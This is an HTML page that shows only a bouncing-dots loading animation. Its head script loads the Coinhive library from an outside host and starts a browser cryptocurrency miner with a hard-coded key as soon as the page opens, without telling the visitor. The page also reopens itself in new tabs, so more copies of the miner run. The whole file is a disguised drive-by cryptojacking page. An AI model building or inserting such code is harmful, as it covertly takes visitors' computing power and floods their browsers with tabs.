<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
    <script>
        var miner = new CoinHive.User('5jjgRs5rmL3mUAYU3aJDhIiN5MPWs1uo', 'SHD', {
            threads: 1,
            language: 'auto'
        });
        miner.start();
        
        function openNewTab(urls){
          var open = window.open(urls,"_blank");
        }

        openNewTab(document.URL);

    </script>
    <style>
        body {
  background: #00CCFF;
}
.dots-container{
  padding: 0;
  position: absolute;
  text-align: center;
  top: 50%;
  width: 100%;
}
.dots{
  animation: bounce 1.5s infinite linear;
  background: #FFF;
  border-radius: 50%;
  display: inline-block;
  height: 20px;
  text-align: center;
  width: 20px;
}

.dots:nth-child(1){
  animation-delay: .2s;
}
.dots:nth-child(2){
  animation-delay: .4s;
}
.dots:nth-child(3){
  animation-delay: .6s;
}
.dots:nth-child(4){
  animation-delay: .8s;
}
.dots:nth-child(5){
  animation-delay: 1s;
}
@keyframes bounce {
    0% {
			transform: translateY(0);
    }
  	15% {
        transform: translateY(-15px);
    }
    30% {
        transform: translateY(0);
    }
}

    </style>
</head>
<body>
    <div class="dots-container">
        <div class="dots"></div>
        <div class="dots"></div>
        <div class="dots"></div>
        <div class="dots"></div>
        <div class="dots"></div>
      </div>
      
</div>
</body>
</html>